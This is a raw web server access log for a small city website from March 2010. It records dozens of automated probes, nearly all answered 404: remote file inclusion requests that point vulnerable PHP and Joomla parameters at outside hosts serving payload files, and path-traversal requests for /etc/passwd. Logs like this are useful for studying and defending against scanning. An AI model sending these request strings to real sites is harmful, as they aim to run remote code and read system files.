216.119.103.12 - - [01/Mar/2010:17:09:35 -0800] "GET /logs/access_090601.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.119.103.12 - - [01/Mar/2010:17:09:35 -0800] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
216.119.103.12 - - [01/Mar/2010:17:09:36 -0800] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:17:34:32 -0800] "GET /logs/access_091201.log/index1.php?choix=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:17:34:32 -0800] "GET /logs/index1.php?choix=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:17:34:32 -0800] "GET /index1.php?choix=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:17:34:36 -0800] "GET /index1.php?choix=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:17:34:36 -0800] "GET /logs/access_091201.log/index1.php?choix=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:17:34:36 -0800] "GET /logs/index1.php?choix=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
121.101.214.54 - - [01/Mar/2010:17:38:51 -0800] "GET /logs/access_090330.log/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://acscc.com//forum/cache/id/idmulti?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
121.101.214.54 - - [01/Mar/2010:17:38:52 -0800] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://acscc.com//forum/cache/id/idmulti?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
121.101.214.54 - - [01/Mar/2010:17:38:53 -0800] "GET /logs/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://acscc.com//forum/cache/id/idmulti?? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
121.101.214.54 - - [01/Mar/2010:17:39:45 -0800] "GET /logs/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://acscc.com//forum/cache/id/idmulti?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
121.101.214.54 - - [01/Mar/2010:17:39:46 -0800] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://acscc.com//forum/cache/id/idmulti?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
121.101.214.54 - - [01/Mar/2010:17:39:46 -0800] "GET /logs/access_090329.log/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://acscc.com//forum/cache/id/idmulti?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
85.233.162.101 - - [01/Mar/2010:17:42:18 -0800] "GET /logs/access_090101.log%20%20/htmltonuke.php?filnavn=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [01/Mar/2010:17:42:18 -0800] "GET /logs/htmltonuke.php?filnavn=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [01/Mar/2010:17:42:18 -0800] "GET /htmltonuke.php?filnavn=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [01/Mar/2010:17:42:25 -0800] "GET /logs/access_090101.log%20%20/htmltonuke.php?filnavn=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [01/Mar/2010:17:42:25 -0800] "GET /htmltonuke.php?filnavn=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [01/Mar/2010:17:42:25 -0800] "GET /logs/htmltonuke.php?filnavn=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
189.89.20.27 - - [01/Mar/2010:17:42:52 -0800] "GET / HTTP/1.1" 200 917 "-" "Mozilla/5.0" "cityofarkadelphia.com"
189.89.20.27 - - [01/Mar/2010:17:42:52 -0800] "GET /logs/access_090330.log%20%20/ HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
189.89.20.27 - - [01/Mar/2010:17:42:52 -0800] "GET /logs/ HTTP/1.1" 200 4227 "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [01/Mar/2010:17:42:57 -0800] "GET /logs/access_091001.log/htmltonuke.php?filnavn=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [01/Mar/2010:17:43:01 -0800] "GET /logs/access_090731.log/htmltonuke.php?filnavn=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [01/Mar/2010:17:43:05 -0800] "GET /logs/access_091001.log/htmltonuke.php?filnavn=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
85.233.162.101 - - [01/Mar/2010:17:43:05 -0800] "GET /logs/access_090731.log/htmltonuke.php?filnavn=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
203.59.136.42 - - [01/Mar/2010:17:43:43 -0800] "GET /htmltonuke.php?filnavn=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
203.59.136.42 - - [01/Mar/2010:17:43:43 -0800] "GET /logs/htmltonuke.php?filnavn=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
203.59.136.42 - - [01/Mar/2010:17:43:44 -0800] "GET /logs/access_091001.log/htmltonuke.php?filnavn=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
203.59.136.42 - - [01/Mar/2010:17:43:44 -0800] "GET /logs/access_090731.log/htmltonuke.php?filnavn=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
67.195.110.164 - - [01/Mar/2010:17:51:37 -0800] "GET /Downloads/?M=D HTTP/1.0" 200 655 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "cityofarkadelphia.com"
67.195.110.164 - - [01/Mar/2010:17:51:42 -0800] "GET /Downloads/?S=D HTTP/1.0" 200 655 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "cityofarkadelphia.com"
203.59.136.42 - - [01/Mar/2010:17:53:54 -0800] "GET /logs/access_090101.log%20%20/htmltonuke.php?filnavn=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
203.59.136.42 - - [01/Mar/2010:17:54:55 -0800] "GET /logs/access_090329.log/htmltonuke.php?filnavn=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
121.101.214.54 - - [01/Mar/2010:18:26:47 -0800] "GET /logs/access_090330.log/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://acscc.com//forum/cache/id/idmulti?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
121.101.214.54 - - [01/Mar/2010:18:26:48 -0800] "GET /components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://acscc.com//forum/cache/id/idmulti?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
121.101.214.54 - - [01/Mar/2010:18:26:48 -0800] "GET /logs/components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://acscc.com//forum/cache/id/idmulti?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:18:28:03 -0800] "GET /logs/access_091101.log//classes/adodbt/sql.php?classes_dir=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:18:28:03 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:18:28:03 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:18:28:22 -0800] "GET /logs/access_091101.log//classes/adodbt/sql.php?classes_dir=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:18:28:22 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:18:28:22 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.178.101.121 - - [01/Mar/2010:18:28:31 -0800] "GET / HTTP/1.1" 200 917 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)" "cityofarkadelphia.com"
70.178.101.121 - - [01/Mar/2010:18:28:32 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:18:28:51 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:18:28:51 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:18:28:51 -0800] "GET /logs/access_100101.log//classes/adodbt/sql.php?classes_dir=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
70.178.101.121 - - [01/Mar/2010:18:29:05 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)" "cityofarkadelphia.com"
70.178.101.121 - - [01/Mar/2010:18:29:07 -0800] "GET / HTTP/1.1" 200 917 "http://cityofarkadelphia.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)" "cityofarkadelphia.com"
70.178.101.121 - - [01/Mar/2010:18:29:09 -0800] "GET /Downloads/ HTTP/1.1" 200 671 "http://cityofarkadelphia.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)" "cityofarkadelphia.com"
70.178.101.121 - - [01/Mar/2010:18:29:19 -0800] "GET /Downloads/LeadAR.ppt HTTP/1.1" 200 1638400 "http://cityofarkadelphia.com/Downloads/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)" "cityofarkadelphia.com"
83.103.72.130 - - [01/Mar/2010:18:29:26 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://idscan.fileave.com/id1.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.103.72.130 - - [01/Mar/2010:18:29:26 -0800] "GET /logs/access_100101.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.103.72.130 - - [01/Mar/2010:18:29:26 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.103.72.130 - - [01/Mar/2010:18:29:27 -0800] "GET /logs/access_090501.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:18:29:41 -0800] "GET /logs/access_100101.log//classes/adodbt/sql.php?classes_dir=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:18:29:42 -0800] "GET /logs/access_100101.log//classes/adodbt/sql.php?classes_dir=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
165.132.30.11 - - [01/Mar/2010:18:30:27 -0800] "GET /logs/access_090329.log//classes/adodbt/sql.php?classes_dir=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
199.120.90.223 - - [01/Mar/2010:18:32:26 -0800] "GET /logs/access_100101.log//classes/adodbt/sql.php?classes_dir=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
199.120.90.223 - - [01/Mar/2010:18:32:26 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
199.120.90.223 - - [01/Mar/2010:18:32:27 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
199.120.90.223 - - [01/Mar/2010:18:35:17 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://geo.metodist.ru/images/id? HTTP/1.0" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
199.120.90.223 - - [01/Mar/2010:18:35:18 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
218.55.227.132 - - [01/Mar/2010:18:36:32 -0800] "GET /logs/access_100101.log//classes/adodbt/sql.php?classes_dir=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
218.55.227.132 - - [01/Mar/2010:18:36:32 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
218.55.227.132 - - [01/Mar/2010:18:36:33 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
83.103.72.130 - - [01/Mar/2010:18:37:38 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.103.72.130 - - [01/Mar/2010:18:37:38 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.103.72.130 - - [01/Mar/2010:18:37:39 -0800] "GET /logs/access_100101.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.103.72.130 - - [01/Mar/2010:18:37:40 -0800] "GET /logs/access_090501.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.55.227.132 - - [01/Mar/2010:18:38:11 -0800] "GET /logs//classes/adodbt/sql.php?classes_dir=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
218.55.227.132 - - [01/Mar/2010:18:38:12 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
199.120.90.223 - - [01/Mar/2010:18:38:22 -0800] "GET /logs/access_090329.log//classes/adodbt/sql.php?classes_dir=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
61.43.89.13 - - [01/Mar/2010:18:39:17 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
61.43.89.13 - - [01/Mar/2010:18:39:18 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
61.43.89.13 - - [01/Mar/2010:18:39:18 -0800] "GET /logs/access_090601.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
61.43.89.13 - - [01/Mar/2010:18:39:37 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
61.43.89.13 - - [01/Mar/2010:18:39:37 -0800] "GET /logs/access_090601.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
61.43.89.13 - - [01/Mar/2010:18:39:37 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
61.43.89.13 - - [01/Mar/2010:18:40:45 -0800] "GET /logs/access_100101.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.sarangnanum.or.kr/bbs///skin/uks_gallery_v3010//setup/homo.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.55.227.132 - - [01/Mar/2010:18:41:14 -0800] "GET /logs/access_090329.log//classes/adodbt/sql.php?classes_dir=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
199.120.90.223 - - [01/Mar/2010:18:41:29 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.812" "cityofarkadelphia.com"
67.195.110.164 - - [01/Mar/2010:18:44:29 -0800] "GET / HTTP/1.0" 200 901 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:18:46:27 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:18:46:27 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:18:46:32 -0800] "GET /logs/access_091001.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
218.55.227.132 - - [01/Mar/2010:18:46:43 -0800] "GET /classes/adodbt/sql.php?classes_dir=http://geo.metodist.ru/images/id? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:18:47:13 -0800] "GET /logs/access_091001.log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:18:47:13 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
64.15.152.132 - - [01/Mar/2010:18:47:13 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.103.72.130 - - [01/Mar/2010:18:51:05 -0800] "GET /logs/access_090201.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.103.72.130 - - [01/Mar/2010:18:51:05 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.103.72.130 - - [01/Mar/2010:18:51:05 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.10.195.144 - - [01/Mar/2010:18:51:11 -0800] "GET /index.php?nav=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "cityofarkadelphia.com"
195.10.195.144 - - [01/Mar/2010:18:51:11 -0800] "GET /index.php?nav=../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "cityofarkadelphia.com"
83.103.72.130 - - [01/Mar/2010:18:51:14 -0800] "GET /logs/access_100201.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.200.203.11 - - [01/Mar/2010:18:51:28 -0800] "GET /logs/access_091231.log///127.0.0.1/pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.103.72.130 - - [01/Mar/2010:18:51:28 -0800] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.103.72.130 - - [01/Mar/2010:18:51:28 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.103.72.130 - - [01/Mar/2010:18:51:28 -0800] "GET /logs/access_090201.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.200.203.11 - - [01/Mar/2010:18:51:33 -0800] "GET /logs///127.0.0.1/pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
122.200.203.11 - - [01/Mar/2010:18:51:33 -0800] "GET //127.0.0.1/pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
83.103.72.130 - - [01/Mar/2010:18:51:38 -0800] "GET /logs/access_100201.log//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://idscan.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
195.10.195.144 - - [01/Mar/2010:18:52:56 -0800] "GET /logs/access_090329.log//index.php?nav=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "cityofarkadelphia.com"
195.10.195.144 - - [01/Mar/2010:18:52:56 -0800] "GET /logs//index.php?nav=../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "-" "cityofarkadelphia.com"
195.10.195.144 - - [01/Mar/2010:18:52:56 -0800] "GET /logs/access_090329.log//index.php?nav=../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "cityofarkadelphia.com"
195.10.195.144 - - [01/Mar/2010:18:52:56 -0800] "GET /logs//index.php?nav=../../../../../../../../../../../../../../etc/passwd HTTP/1.1" 404 - "-" "-" "cityofarkadelphia.com"
122.201.82.173 - - [01/Mar/2010:18:56:21 -0800] "GET /logs//administrator/index3.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
122.201.82.173 - - [01/Mar/2010:18:56:21 -0800] "GET /administrator/index3.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
95.170.245.35 - - [01/Mar/2010:18:57:44 -0800] "GET /login.php?_zb_path=http://www.abcoroti.com/~starboy/img/blank.gif?? HTTP/1.1" 404 - "-" "libwww-perl/5.808" "cityofarkadelphia.com"
84.38.160.77 - - [01/Mar/2010:18:58:03 -0800] "GET /administrator/index3.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "cityofarkadelphia.com"
84.38.160.77 - - [01/Mar/2010:18:58:03 -0800] "GET /logs/access_090701.log//administrator/index3.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "cityofarkadelphia.com"
84.38.160.77 - - [01/Mar/2010:18:58:03 -0800] "GET /logs//administrator/index3.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.76" "cityofarkadelphia.com"
122.201.82.173 - - [01/Mar/2010:18:58:17 -0800] "GET /logs/access_090701.log//administrator/index3.php?mosConfig_absolute_path=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "cityofarkadelphia.com"
122.200.203.11 - - [01/Mar/2010:18:58:25 -0800] "GET //127.0.0.1/pnc/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "cityofarkadelphia.com"
